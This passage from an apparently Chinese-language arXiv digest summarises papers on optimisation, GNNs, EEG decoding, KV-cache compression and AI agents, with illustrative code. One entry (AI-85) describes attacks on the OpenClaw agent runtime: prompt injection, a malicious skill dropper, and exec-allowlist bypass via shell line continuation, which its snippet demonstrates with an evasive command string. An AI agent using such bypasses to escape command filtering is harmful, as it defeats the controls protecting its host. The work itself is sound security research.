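        [{"br": "VCTK", "ag": "TTS-A"}] * 20)
balanced = balance_br_ag(data)
print(len(balanced))  # 30:3 组,每组下采样到 10 条
```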
[AI-81] A Novel Immune Algorithm for Multiparty Multiobjective Optimization
【速读】:该论文旨在解决多决策者(Multiple Decision Makers, DMs)场景下的多目标优化问题,即多党多目标优化问题(Multiparty Multiobjective Optimization Problems, MPMOPs),这类问题在实际应用中广泛存在,其核心挑战在于如何找到一组解,使其尽可能接近每个决策者的帕累托前沿(Pareto front)。传统多目标进化算法(Multiobjective Evolutionary Algorithms, MOEAs)在此类问题中面临搜索效率低和选择机制不足的问题。论文提出的解决方案是设计一种新型的多党免疫算法(Multiparty Immune Algorithm, MPIA),其关键创新在于引入基于不同DM视角下个体非支配排序等级的跨党引导交叉策略(inter-party guided crossover strategy),以及基于多党覆盖度量(Multiparty Cover Metric, MCM)的自适应激活策略(adaptive activation strategy)。这两项机制协同作用,有效提升了算法的搜索能力、维持了从各决策者视角出发的种群多样性,并增强了对复杂MPMOP问题的求解性能。
链接: https://arxiv.org/abs/2603.27541
作者: Kesheng Chen,Wenjian Luo,Qi Zhou,Yujiang liu,Peilan Xu,Yuhui Shi
机构: 未知
类目: Neural and Evolutionary Computing (cs.NE); Artificial Intelligence (cs.AI)
备注: © 2026 IEEE. Personal use of this material is permitted. Permission from IEEE must be obtained for all other uses, in any current or future media, including reprinting/republishing this material for advertising or promotional purposes, creating new collective works, for resale or redistribution to servers or lists, or reuse of any copyrighted component of this work in other works
Abstract:Traditional multiobjective optimization problems (MOPs) are insufficiently equipped for scenarios involving multiple decision makers (DMs), which are prevalent in many practical applications. These scenarios are categorized as multiparty multiobjective optimization problems (MPMOPs). For MPMOPs, the goal is to find a solution set that is as close to the Pareto front of each DM as much as possible. This poses challenges for evolutionary algorithms in terms of searching and selecting. To better solve MPMOPs, this paper proposes a novel approach called the multiparty immune algorithm (MPIA). The MPIA incorporates an inter-party guided crossover strategy based on the individual’s non-dominated sorting ranks from different DM perspectives and an adaptive activation strategy based on the proposed multiparty cover metric (MCM). These strategies enable MPIA to activate suitable individuals for the next operations, maintain population diversity from different DM perspectives, and enhance the algorithm’s search capability. To evaluate the performance of MPIA, we compare it with ordinary multiobjective evolutionary algorithms (MOEAs) and state-of-the-art multiparty multiobjective optimization evolutionary algorithms (MPMOEAs) by solving synthetic multiparty multiobjective problems and real-world biparty multiobjective unmanned aerial vehicle path planning (BPUAV-PP) problems involving multiple DMs. Experimental results demonstrate that MPIA outperforms other algorithms.
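MPIA 的跨党引导交叉依赖“同一个体在不同决策者(DM)目标子集下的非支配层级”。下面以朴素非支配排序示意该多视角层级的计算(目标取最小化;仅为示意,与论文算法的具体实现无关):

```python
def dominates(a, b):
    """最小化意义下 a 支配 b:各目标不劣且至少一个严格更优。"""
    return all(x <= y for x, y in zip(a, b)) and any(x < y for x, y in zip(a, b))

def nd_rank(objs):
    """朴素非支配排序:返回每个个体的层级(0 为第一前沿)。"""
    n = len(objs)
    ranks, remaining, r = [None] * n, set(range(n)), 0
    while remaining:
        front = [i for i in remaining
                 if not any(dominates(objs[j], objs[i])
                            for j in remaining if j != i)]
        for i in front:
            ranks[i] = r
        remaining -= set(front)
        r += 1
    return ranks

def multiparty_ranks(pop, parties):
    """对每个 DM 关注的目标子集分别计算非支配层级(假设实现,
    MPIA 的跨党引导交叉即基于这些层级挑选引导个体)。"""
    return [nd_rank([[ind[k] for k in p] for ind in pop]) for p in parties]

pop = [[1, 2, 3], [2, 1, 4], [3, 3, 1]]  # 3 个个体、3 个目标(越小越好)
parties = [[0, 1], [2]]                   # DM1 关注目标 0、1,DM2 只关注目标 2
print(multiparty_ranks(pop, parties))     # [[0, 0, 1], [1, 2, 0]]
```

同一个体在不同 DM 视角下层级可以相差很大(如个体 2),这正是多党问题区别于普通多目标问题之处。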
[AI-82] Dual-Stage LLM Framework for Scenario-Centric Semantic Interpretation in Driving Assistance
【速读】:该论文旨在解决生成式 AI(Generative AI)在高级驾驶辅助系统(ADAS)中用于风险推理时,因部分可观测性和语义模糊性导致的安全相关故障问题。其解决方案的关键在于提出一种以场景为中心的可复现审计框架,通过从多模态驾驶数据中构建确定性的、时间边界明确的场景窗口,并在固定提示约束和封闭数值风险模式下进行评估,从而确保不同模型输出的结构化与可比性。该方法揭示了大语言模型(LLM)在风险等级分配、高风险升级、证据使用及因果归因等方面的系统性差异,强调了场景驱动的审计机制和显式语义不确定性管理对于实现安全对齐的驾驶辅助系统的重要性。
链接: https://arxiv.org/abs/2603.27536
作者: Jean Douglas Carvalho,Hugo Taciro Kenji,Ahmad Mohammad Saber,Glaucia Melo,Max Mauro Dias Santos,Deepa Kundur
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Advanced Driver Assistance Systems (ADAS) increasingly rely on learning-based perception, yet safety-relevant failures often arise without component malfunction, driven instead by partial observability and semantic ambiguity in how risk is interpreted and communicated. This paper presents a scenario-centric framework for reproducible auditing of LLM-based risk reasoning in urban driving contexts. Deterministic, temporally bounded scenario windows are constructed from multimodal driving data and evaluated under fixed prompt constraints and a closed numeric risk schema, ensuring structured and comparable outputs across models. Experiments on a curated near-people scenario set compare two text-only models and one multimodal model under identical inputs and prompts. Results reveal systematic inter-model divergence in severity assignment, high-risk escalation, evidence use, and causal attribution. Disagreement extends to the interpretation of vulnerable road user presence, indicating that variability often reflects intrinsic semantic indeterminacy rather than isolated model failure. These findings highlight the importance of scenario-centric auditing and explicit ambiguity management when integrating LLM-based reasoning into safety-aligned driver assistance systems.
[AI-83] Cross-attentive Cohesive Subgraph Embedding to Mitigate Oversquashing in GNNs
【速读】:该论文旨在解决图神经网络(Graph Neural Networks, GNNs)中存在的“过度压缩”(oversquashing)问题,即在消息传递过程中,长程信息因受限的传播路径而被扭曲,导致模型难以捕捉全局上下文,尤其在密集和异质性(heterophilic)区域性能下降。解决方案的关键在于提出一种新颖的图学习框架,通过引入跨注意力机制(cross-attentive)来构建紧密连通的子图表示(cohesive subgraph representations),从而增强节点嵌入。该方法强调长程信息中的结构一致性,同时过滤掉噪声或无关连接,在不加重瓶颈通道的前提下保留关键全局上下文,有效缓解了过度压缩现象。
链接: https://arxiv.org/abs/2603.27529
作者: Tanvir Hossain,Muhammad Ifte Khairul Islam,Lilia Chebbah,Charles Fanning,Esra Akbas
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Graph neural networks (GNNs) have achieved strong performance across various real-world domains. Nevertheless, they suffer from oversquashing, where long-range information is distorted as it is compressed through limited message-passing pathways. This bottleneck limits their ability to capture essential global context and decreases their performance, particularly in dense and heterophilic regions of graphs. To address this issue, we propose a novel graph learning framework that enriches node embeddings via cross-attentive cohesive subgraph representations to mitigate the impact of excessive long-range dependencies. This framework enhances the node representation by emphasizing cohesive structure in long-range information but removing noisy or irrelevant connections. It preserves essential global context without overloading the narrow bottlenecked channels, which further mitigates oversquashing. Extensive experiments on multiple benchmark datasets demonstrate that our model achieves consistent improvements in classification accuracy over standard baseline methods.
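“以节点为 query、以各紧密子图表示为 key/value 的交叉注意力”可以用下面的单头 numpy 草图示意(示意实现,维度与残差式融合均为假设,并非论文模型):

```python
import numpy as np

def cross_attend(node, subgraphs):
    """单头交叉注意力示意(假设实现):query 为节点嵌入,
    key/value 为该节点所属各紧密子图的表示;输出以残差方式注入子图上下文。"""
    d = node.shape[-1]
    scores = subgraphs @ node / np.sqrt(d)  # (S,) 节点与各子图的相似度
    w = np.exp(scores - scores.max())
    w /= w.sum()                            # softmax 注意力权重
    return node + w @ subgraphs             # 残差式融合

rng = np.random.default_rng(0)
node = rng.standard_normal(8)
subs = rng.standard_normal((5, 8))          # 5 个紧密子图的嵌入
out = cross_attend(node, subs)
print(out.shape)  # (8,)
```

由于注意力权重对低相关子图会自动趋近于零,这一步起到“强调紧密结构、过滤噪声连接”的作用。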
[AI-84] Safer Builders Risky Maintainers: A Comparative Study of Breaking Changes in Human vs Agentic PRs
【速读】:该论文旨在解决AI编码代理(AI coding agents)在生成代码时引入破坏性变更(breaking changes)的风险问题,尤其是在维护类任务中,其潜在风险尚未被充分理解。为评估AI生成拉取请求(PRs)的可靠性,研究者基于AIDev数据集中的7,191个代理生成PR与1,402个人类编写PR进行对比分析,并开发了一种基于抽象语法树(AST)的代码变更检测工具,以识别潜在的破坏性更改。关键解决方案在于通过结构化分析代码变更模式,揭示了AI代理在不同任务场景下的破坏性变更频率差异:尽管整体上AI代理引入的破坏性变更少于人类(3.45% vs. 7.40%),但在重构(refactoring)和杂项维护(chore)任务中,其破坏性变更率显著升高(分别为6.72%和9.35%),并发现“自信陷阱”现象——即高置信度的代理PR仍可能引入破坏性变更,提示需对维护类变更实施更严格的审查机制。
链接: https://arxiv.org/abs/2603.27524
作者: K M Ferdous,Dipayan Banik,Kowshik Chowdhury,Shazibul Islam Shamim
机构: 未知
类目: Software Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注: Accepted at 23rd International Conference on Mining Software Repositories (MSR), 2026
Abstract:AI coding agents are increasingly integrated into modern software engineering workflows, actively collaborating with human developers to create pull requests (PRs) in open-source repositories. Although coding agents improve developer productivity, they often generate code with more bugs and security issues than human-authored code. While human-authored PRs often break backward compatibility, leading to breaking changes, the potential for agentic PRs to introduce breaking changes remains underexplored. The goal of this paper is to help developers and researchers evaluate the reliability of AI-generated PRs by examining the frequency and task contexts in which AI agents introduce breaking changes. We conduct a comparative analysis of 7,191 agent-generated PRs with 1402 human-authored PRs from Python repositories in the AIDev dataset. We develop a tool that analyzes code changes in commits corresponding to the agentic PRs and leverages an abstract syntax tree (AST) based analysis to detect potential breaking changes. Our findings show that AI agents introduce fewer breaking changes overall than humans (3.45% vs. 7.40%) in code generation tasks. However, agents exhibit substantially higher risk during maintenance tasks, with refactoring and chore changes introducing breaking changes at rates of 6.72% and 9.35%, respectively. We also identify a “Confidence Trap” where highly confident agentic PRs still introduce breaking changes, indicating the need for stricter review during maintenance oriented changes regardless of reported confidence score.
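摘要中基于 AST 的破坏性变更检测,核心思路是对比两版代码的公共 API。下面用 Python 标准库 `ast` 给出一个极简草图(判定规则是简化假设:公共函数被删除或参数列表变化即视为潜在破坏性变更,论文工具的规则更完整):

```python
import ast

def public_api(source):
    """提取模块顶层公共函数名及其位置参数列表(简化)。"""
    api = {}
    for node in ast.parse(source).body:
        if isinstance(node, ast.FunctionDef) and not node.name.startswith("_"):
            api[node.name] = [a.arg for a in node.args.args]
    return api

def breaking_changes(old_src, new_src):
    """对比两版源码的公共 API,报告潜在破坏性变更(示意实现)。"""
    old, new = public_api(old_src), public_api(new_src)
    issues = []
    for name, params in old.items():
        if name not in new:
            issues.append(f"removed: {name}")
        elif new[name] != params:
            issues.append(f"signature changed: {name}")
    return issues

old = "def load(path, cache):\n    ...\ndef save(obj):\n    ..."
new = "def load(path):\n    ...\ndef _save(obj):\n    ..."
print(breaking_changes(old, new))  # ['signature changed: load', 'removed: save']
```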
[AI-85] A Systematic Taxonomy of Security Vulnerabilities in the OpenClaw AI Agent Framework
【速读】:该论文旨在解决生成式 AI (Generative AI) 代理框架中因大语言模型(LLM)推理与宿主执行环境(如 shell、文件系统、容器等)深度集成所引发的结构性安全挑战。其核心问题在于传统软件安全模型难以覆盖此类多层信任交互带来的新型攻击面,特别是跨层信任边界失效导致的远程代码执行(RCE)风险。解决方案的关键在于提出一个基于架构层级(如执行策略、网关、沙箱等)与攻击类型(如身份伪造、策略绕过、提示注入等)的双轴分类体系,系统性地梳理了190个漏洞 advisories,并揭示出三个关键发现:一是网关与节点宿主子系统协同可构成完整的未认证 RCE 攻击链;二是执行白名单机制依赖封闭世界假设,易被 shell 行续、busybox 多路复用和 GNU 选项缩写等手段破坏;三是插件通道缺乏运行时策略强制,导致恶意技能可在 LLM 上下文中执行两阶段 Dropper,突破执行管道防护。研究指出,根本弱点在于各层独立实施信任控制而非统一策略边界,使得跨层攻击对局部修复具有鲁棒性。
链接: https://arxiv.org/abs/2603.27517
作者: Surada Suwansathit,Yuxuan Zhang,Guofei Gu
机构: 未知
类目: Cryptography and Security (cs.CR); Artificial Intelligence (cs.AI)
备注:
Abstract:AI agent frameworks connecting large language model (LLM) reasoning to host execution surfaces–shell, filesystem, containers, and messaging–introduce security challenges structurally distinct from conventional software. We present a systematic taxonomy of 190 advisories filed against OpenClaw, an open-source AI agent runtime, organized by architectural layer and trust-violation type. Vulnerabilities cluster along two orthogonal axes: (1) the system axis, reflecting the architectural layer (exec policy, gateway, channel, sandbox, browser, plugin, agent/prompt); and (2) the attack axis, reflecting adversarial techniques (identity spoofing, policy bypass, cross-layer composition, prompt injection, supply-chain escalation). Patch-differential evidence yields three principal findings. First, three Moderate- or High-severity advisories in the Gateway and Node-Host subsystems compose into a complete unauthenticated remote code execution (RCE) path–spanning delivery, exploitation, and command-and-control–from an LLM tool call to the host process. Second, the exec allowlist, the primary command-filtering mechanism, relies on a closed-world assumption that command identity is recoverable via lexical parsing. This is invalidated by shell line continuation, busybox multiplexing, and GNU option abbreviation. Third, a malicious skill distributed via the plugin channel executed a two-stage dropper within the LLM context, bypassing the exec pipeline and demonstrating that the skill distribution surface lacks runtime policy enforcement. The dominant structural weakness is per-layer trust enforcement rather than unified policy boundaries, making cross-layer attacks resilient to local remediation.
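摘要指出词法白名单的封闭世界假设会被 shell 行续符破坏。下面用一段演示代码说明这一缺陷的原理(纯演示,并非 OpenClaw 的真实代码,也不实际执行任何命令):

```python
ALLOWLIST = {"ls", "echo", "cat"}

def naive_allow(cmd):
    """封闭世界假设下的词法白名单:仅凭首个空白分隔 token 判断命令身份
    (论文指出的缺陷模式)。"""
    return cmd.split()[0] in ALLOWLIST

# shell 会在执行前把行续符 "cu\<换行>rl" 重新拼回 curl,
# 但词法检查只看到被放行的 "echo":
evasive = "echo hi; cu\\\nrl attacker.example"
print(naive_allow(evasive))                   # True:词法检查放行
print("curl" in evasive.replace("\\\n", ""))  # True:拼接后真实命令是 curl
```

这说明仅靠字符串解析无法恢复命令的真实身份,需要在执行语义层(而非词法层)实施策略。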
[AI-86] Copilot-Assisted Second-Thought Framework for Brain-to-Robot Hand Motion Decoding
【速读】:该论文旨在解决从脑电图(EEG)中高精度预测运动学参数(Motor Kinematics Prediction, MKP)的问题,以提升运动相关脑机接口(BCI)的性能。其核心挑战在于如何有效建模EEG信号的长时序依赖性并实现跨被试泛化。解决方案的关键在于提出一种CNN-注意力混合模型,结合卷积神经网络(CNN)对局部空间特征的提取能力与Transformer中的自注意力机制对全局时间依赖性的建模优势,从而在单被试实验中取得优异的皮尔逊相关系数(PCC)表现(最高达0.9946),并在引入肌电图(EMG)多模态信息后进一步提升解码精度;此外,通过引入基于有限状态机的“副驾驶”(copilot)后处理框架,利用运动状态感知的判别器过滤低置信度点,在仅剔除少于20%数据点的前提下显著改善轨迹保真度,使EEG单独解码的PCC提升至0.93。
链接: https://arxiv.org/abs/2603.27492
作者: Yizhe Li(1),Shixiao Wang(1),Jian K. Liu(1) ((1) University of Birmingham, Birmingham, United Kingdom)
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注:
Abstract:Motor kinematics prediction (MKP) from electroencephalography (EEG) is an important research area for developing movement-related brain-computer interfaces (BCIs). While traditional methods often rely on convolutional neural networks (CNNs) or recurrent neural networks (RNNs), Transformer-based models have shown strong ability in modeling long sequential EEG data. In this study, we propose a CNN-attention hybrid model for decoding hand kinematics from EEG during grasp-and-lift tasks, achieving strong performance in within-subject experiments. We further extend this approach to EEG-EMG multimodal decoding, which yields substantially improved results. Within-subject tests achieve PCC values of 0.9854, 0.9946, and 0.9065 for the X, Y, and Z axes, respectively, computed on the midpoint trajectory between the thumb and index finger, while cross-subject tests result in 0.9643, 0.9795, and 0.5852. The decoded trajectories from both modalities are then used to control a Franka Panda robotic arm in a MuJoCo simulation. To enhance trajectory fidelity, we introduce a copilot framework that filters low-confidence decoded points using a motion-state-aware critic within a finite-state machine. This post-processing step improves the overall within-subject PCC of EEG-only decoding to 0.93 while excluding fewer than 20% of the data points.
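摘要中“基于有限状态机、按运动状态过滤低置信度解码点”的副驾驶后处理,可以用下面的草图示意(状态名、阈值与“沿用上一可信点”的策略均为假设,并非论文的具体实现):

```python
def copilot_filter(points, confs, states, thresholds):
    """运动状态感知的“副驾驶”后处理示意(假设实现):按当前状态
    (如 reach/grasp/lift)查阈值,低置信度解码点被丢弃并沿用上一可信点。
    返回过滤后的轨迹和保留比例。"""
    out, kept = [], 0
    last = points[0]
    for p, c, s in zip(points, confs, states):
        if c >= thresholds[s]:
            last, kept = p, kept + 1
        out.append(last)
    return out, kept / len(points)

traj, ratio = copilot_filter(
    points=[0.0, 0.1, 0.9, 0.3, 0.4],
    confs=[0.95, 0.90, 0.40, 0.88, 0.92],
    states=["reach", "reach", "grasp", "grasp", "lift"],
    thresholds={"reach": 0.8, "grasp": 0.85, "lift": 0.8},
)
print(traj, ratio)  # [0.0, 0.1, 0.1, 0.3, 0.4] 0.8
```

第 3 个点虽然偏离明显(0.9),但因置信度不足被丢弃,轨迹沿用上一可信点;保留比例 0.8 与摘要“剔除少于 20% 数据点”的设定一致。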
[AI-87] On Token's Dilemma: Dynamic MoE with Drift-Aware Token Assignment for Continual Learning of Large Vision Language Models CVPR2026
【速读】:该论文旨在解决多模态持续指令微调(Multimodal Continual Instruction Tuning)中因路由漂移(routing-drift)导致的遗忘问题:在基于混合专家(Mixture of Experts, MoE)架构的模型中,尽管新增专家可实现增量扩展,但旧任务样本在新任务训练过程中仍可能被错误地分配至新专家,从而破坏原有知识表示并降低对先前任务的性能。解决方案的关键在于提出 LLaVA-DyMoE——一种具有漂移感知的动态 MoE 框架,其核心机制包括:通过分析 token 级别的路由得分分布识别模糊与旧 token 类型,并施加针对性的分配引导策略,将此类 token 从新专家中“驱离”,以保留既定路由模式;同时引入互补的路由得分正则化项,强化专家组间分离性并促进新专家的专业化分工,从而有效缓解路由漂移引起的遗忘现象。
链接: https://arxiv.org/abs/2603.27481
作者: Chongyang Zhao,Mingsong Li,Haodong Lu,Dong Gong
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: Accepted at CVPR 2026
Abstract:Multimodal Continual Instruction Tuning aims to continually enhance Large Vision Language Models (LVLMs) by learning from new data without forgetting previously acquired knowledge. Mixture of Experts (MoE) architectures naturally facilitate this by incrementally adding new experts and expanding routers while keeping the existing ones frozen. However, despite expert isolation, MoE-based continual learners still suffer from forgetting due to routing-drift: old-task tokens become mistakenly attracted to newly added experts, degrading performance on prior tasks. We analyze the failure mode at the token level and reveal the token’s dilemma: ambiguous and old tokens in new-task data offer minimal learning benefit yet induce forgetting when routed to new experts, due to their ambiguous routing assignment during training. Motivated by this, we propose LLaVA-DyMoE, a dynamic MoE framework that incrementally expands the MoE with drift-aware token assignment. We characterize token types via their routing score distributions and apply targeted regularization. Specifically, a token-level assignment guidance steers ambiguous and old tokens away from new experts to preserve established routing patterns and alleviate routing-drift, while complementary routing score regularizations enforce expert-group separation and promote new-expert specialization. Extensive experiments demonstrate that our LLaVA-DyMoE effectively mitigates routing-drift-induced forgetting, achieving over a 7% gain in mean final accuracy and a 12% reduction in forgetting compared to baselines. The project page is this https URL.
[AI-88] PeopleSearchBench: A Multi-Dimensional Benchmark for Evaluating AI-Powered People Search Platforms
【速读】:该论文旨在解决当前AI驱动的人员搜索平台在招聘、销售线索挖掘、专家查找及影响力人物(KOL)发现等场景中缺乏统一评估基准的问题。现有方法多依赖主观性的大语言模型(LLM)作为评判者,导致评价结果不可靠且难以复现。其解决方案的关键在于提出了一种名为“Criteria-Grounded Verification”的事实相关性验证流程:该流程从每个查询中提取明确、可验证的标准,并通过实时网络搜索判断返回人员是否满足这些标准,从而生成基于事实的二元相关性判断,而非依赖主观评分。这一机制显著提升了评估的客观性和可解释性,为系统性能比较提供了可靠依据。
链接: https://arxiv.org/abs/2603.27476
作者: Wei Wang,Tianyu Shi,Shuai Zhang,Boyang Xia,Zequn Xie,Chenyu Zeng,Qi Zhang,Lynn Ai,Yaqi Yu,Kaiming Zhang,Feiyue Tang
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 25 pages
Abstract:AI-powered people search platforms are increasingly used in recruiting, sales prospecting, and professional networking, yet no widely accepted benchmark exists for evaluating their performance. We introduce PeopleSearchBench, an open-source benchmark that compares four people search platforms on 119 real-world queries across four use cases: corporate recruiting, B2B sales prospecting, expert search with deterministic answers, and influencer/KOL discovery. A key contribution is Criteria-Grounded Verification, a factual relevance pipeline that extracts explicit, verifiable criteria from each query and uses live web search to determine whether returned people satisfy them. This produces binary relevance judgments grounded in factual verification rather than subjective holistic LLM-as-judge scores. We evaluate systems on three dimensions: Relevance Precision (padded nDCG@10), Effective Coverage (task completion and qualified result yield), and Information Utility (profile completeness and usefulness), averaged equally into an overall score. Lessie, a specialized AI people search agent, performs best overall, scoring 65.2, 18.5% higher than the second-ranked system, and is the only system to achieve 100% task completion across all 119 queries. We also report confidence intervals, human validation of the verification pipeline (Cohen’s kappa = 0.84), ablations, and full documentation of queries, prompts, and normalization procedures. Code, query definitions, and aggregated results are available on GitHub.
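评测维度中的 padded nDCG@10 可以按下面的方式计算(实现细节为假设:结果不足 k 条用 0 相关补齐,并以 k 条全相关作为理想列表归一化,使“少而准”的系统无法虚高;具体定义以论文为准):

```python
import math

def padded_ndcg(rels, k=10):
    """二元相关性下 padded nDCG@k 的一种实现假设:
    不足 k 条补 0,理想 DCG 按 k 条全相关计算。"""
    rels = (list(rels) + [0] * k)[:k]
    dcg = sum(r / math.log2(i + 2) for i, r in enumerate(rels))
    idcg = sum(1 / math.log2(i + 2) for i in range(k))
    return dcg / idcg

print(round(padded_ndcg([1] * 10), 3))   # 1.0:10 条全相关
print(round(padded_ndcg([1, 1, 1]), 3))  # 0.469:只返回 3 条相关结果,补齐后被惩罚
```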
[AI-89] KV Cache Quantization for Self-Forcing Video Generation: A 33-Method Empirical Study
【速读】:该论文旨在解决自强化视频生成(self-forcing video generation)中因长序列滚动生成导致的键值(Key-Value, KV)缓存内存占用急剧上升的问题。其核心挑战在于,随着生成长度增加,KV缓存呈线性增长,显著限制了模型在有限显存(VRAM)下的可扩展性与实用性。解决方案的关键在于对KV缓存进行压缩优化,通过系统性地评估33种量化和缓存策略组合,在保持生成质量的同时实现显存效率的最大化。研究发现,基于FlowCache启发的软剪枝INT4适配方法在压缩比(5.42–5.49倍)与峰值显存降低(从19.28 GB降至约11.7 GB)之间取得了最佳平衡,且仅带来适度的运行时开销,成为当前最实用的部署方案;而高保真压缩方法虽能维持图像质量,但因显著增加计算或内存负担而不适合实际部署。此外,论文指出单纯压缩存储空间并不足以解决问题,因现有集成机制仍会在注意力计算和缓存刷新阶段保留大量BF16精度缓冲区,从而抵消压缩收益。
链接: https://arxiv.org/abs/2603.27469
作者: Suraj Ranganath,Vaishak Menon,Anish Patnaik
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Self-forcing video generation extends a short-horizon video model to longer rollouts by repeatedly feeding generated content back in as context. This scaling path immediately exposes a systems bottleneck: the key-value (KV) cache grows with rollout length, so longer videos require not only better generation quality but also substantially better memory behavior. We present a comprehensive empirical study of KV-cache compression for self-forcing video generation on a Wan2.1-based Self-Forcing stack. Our study covers 33 quantization and cache-policy variants, 610 prompt-level observations, and 63 benchmark-level summaries across two evaluation settings: MovieGen for single-shot 10-second generation and StoryEval for longer narrative-style stability. We jointly evaluate peak VRAM, runtime, realized compression ratio, VBench imaging quality, BF16-referenced fidelity (SSIM, LPIPS, PSNR), and terminal drift. Three findings are robust. First, the strongest practical operating region is a FlowCache-inspired soft-prune INT4 adaptation, which reaches 5.42-5.49x compression while reducing peak VRAM from 19.28 GB to about 11.7 GB with only modest runtime overhead. Second, the highest-fidelity compressed methods, especially PRQ_INT4 and QUAROT_KV_INT4, are not the best deployment choices because they preserve quality at severe runtime or memory cost. Third, nominal compression alone is not sufficient: several methods shrink KV storage but still exceed BF16 peak VRAM because the current integration reconstructs or retains large BF16 buffers during attention and refresh stages. The result is a benchmark harness, analysis workflow, and empirical map of which KV-cache ideas are practical today and which are promising research directions for better memory integration. Code, data products, and the presentation dashboard are available at this https URL.
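研究中反复出现的 INT4 KV 缓存量化,其基本操作可以用“分组对称量化再反量化”的草图示意(分组大小与缩放方式均为假设,并非文中任一具体方法):

```python
import numpy as np

def int4_dequant_roundtrip(x, group=64):
    """KV 缓存分组对称 INT4 量化/反量化的最小示意(假设实现):
    每 group 个元素共享一个缩放因子,码域为 [-8, 7]。"""
    flat = x.reshape(-1, group)
    scale = np.abs(flat).max(axis=1, keepdims=True) / 7.0 + 1e-12
    q = np.clip(np.round(flat / scale), -8, 7).astype(np.int8)  # 存储为 4-bit 码
    return (q * scale).reshape(x.shape)

rng = np.random.default_rng(0)
kv = rng.standard_normal((4, 128)).astype(np.float32)
err = float(np.abs(int4_dequant_roundtrip(kv) - kv).max())
print(err < 0.5)  # True:逐元素误差约为半个量化步长
```

摘要的警示正在于此:即使码本如上压缩到 4 bit,若注意力计算阶段仍要把 `q * scale` 物化成 BF16 大缓冲区,峰值显存收益就会被抵消。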
[AI-90] TurboAngle: Near-Lossless KV Cache Compression via Uniform Angle Quantization
【速读】:该论文旨在解决大语言模型推理过程中KV缓存(Key-Value Cache)占用内存过高的问题,从而提升推理效率。其核心解决方案是通过在快速沃尔什-哈达玛变换(Fast Walsh-Hadamard Transform)域中对角度进行量化来压缩KV缓存条目,其中引入随机对角旋转使连续元素对近似均匀分布在单位圆上,从而提升量化精度;进一步提出按层早期增强(per-layer early-boost)机制,为每一层独立配置键(K)和值(V)码本大小,将更高精度分配给模型特定的关键层。实验表明,该方法在7个模型(1B至7B参数)中实现了无损或近乎无损的压缩效果(3.28–3.67比特/元素),并结合非对称归一化量化(8比特键、4比特对数空间值)在Mistral-7B上实现6.56比特/元素的压缩率,仅带来+0.0014困惑度下降且无需校准数据。
链接: https://arxiv.org/abs/2603.27467
作者: Dipkumar Patel
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: 10 pages, 7 tables, 2 figures
Abstract:We compress KV cache entries by quantizing angles in the Fast Walsh-Hadamard domain, where a random diagonal rotation makes consecutive element pairs approximately uniformly distributed on the unit circle. We extend this angular quantizer with per-layer early-boost, which independently configures K and V codebook sizes at each layer, allocating higher precision to a model-specific subset of critical layers. Across seven models (1B to 7B parameters), per-layer early-boost achieves lossless compression on four models and near-lossless quality on six of seven, at 3.28 to 3.67 angle bits per element. Asymmetric norm quantization (8-bit for keys, 4-bit log-space for values) yields 6.56 total bits per element on Mistral-7B with perplexity degradation of +0.0014 and no calibration data. A layer-group sensitivity analysis reveals model-specific bottleneck patterns, including K-dominated versus V-dominated layers and negative-transfer layers where increased precision degrades quality.
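“随机符号旋转 + FWHT 后对相邻元素对做均匀角度量化”的核心变换,可以用下面的 numpy 草图示意(示意实现:比特数、配对与重建方式均为假设;论文中幅值另做 4/8-bit 量化,此处为突出角度量化而原样保留幅值):

```python
import numpy as np

def fwht(x):
    """未归一化快速 Walsh-Hadamard 变换(最后一维长度须为 2 的幂)。"""
    n = x.shape[-1]
    y = x.astype(np.float64).copy()
    h = 1
    while h < n:
        y = y.reshape(-1, n // (2 * h), 2, h)
        a, b = y[..., 0, :].copy(), y[..., 1, :].copy()
        y[..., 0, :], y[..., 1, :] = a + b, a - b
        y = y.reshape(-1, n)
        h *= 2
    return y

def angle_quant_roundtrip(v, bits=4, seed=0):
    """TurboAngle 式角度量化示意(假设实现):随机符号旋转 + FWHT 之后,
    相邻元素两两成对近似均匀分布在单位圆上;对每对相位做 2^bits 档均匀量化。"""
    n = v.shape[-1]
    sign = np.random.default_rng(seed).choice([-1.0, 1.0], size=n)
    h = fwht((v * sign)[None, :])[0] / np.sqrt(n)  # 正交归一化变换
    pairs = h.reshape(-1, 2)
    ang = np.arctan2(pairs[:, 1], pairs[:, 0])
    step = 2 * np.pi / (1 << bits)
    ang_q = np.round(ang / step) * step            # 均匀角度量化
    mag = np.hypot(pairs[:, 0], pairs[:, 1])       # 幅值原样保留(简化)
    rec = np.stack([mag * np.cos(ang_q), mag * np.sin(ang_q)], axis=1).reshape(-1)
    # H/sqrt(n) 自逆,再除去随机符号即可还原
    return fwht(rec[None, :])[0] / np.sqrt(n) * sign

v = np.random.default_rng(1).standard_normal(64)
rel_err = np.linalg.norm(angle_quant_roundtrip(v) - v) / np.linalg.norm(v)
print(rel_err < 0.2)  # True:4 bit 角度的相对误差上界约 2*sin(pi/32) ≈ 0.196
```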
[AI-91] GIFT: Bootstrapping Image-to-CAD Program Synthesis via Geometric Feedback
【速读】:该论文旨在解决从图像生成可执行CAD程序时,视觉几何与符号程序表示之间对齐不可靠的问题,尤其是在设计复杂度增加时,现有方法因训练数据稀缺而表现脆弱。其核心解决方案是提出几何推理反馈微调(Geometric Inference Feedback Tuning, GIFT),关键在于利用测试时计算生成高质量训练样本:通过软拒绝采样(GIFT-REJECT)保留超出精确匹配的多样化高保真程序,以及故障驱动增强(GIFT-FAIL)将近似预测转化为合成训练样本,从而提升模型在复杂几何上的鲁棒性;该方法在不依赖人工标注或专用架构的前提下,实现推理计算减少80%的同时,使平均IoU提升12%。
链接: https://arxiv.org/abs/2603.27448
作者: Giorgio Giannone,Anna Clare Doris,Amin Heyrani Nobari,Kai Xu,Akash Srivastava,Faez Ahmed
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computational Engineering, Finance, and Science (cs.CE)
备注: preprint
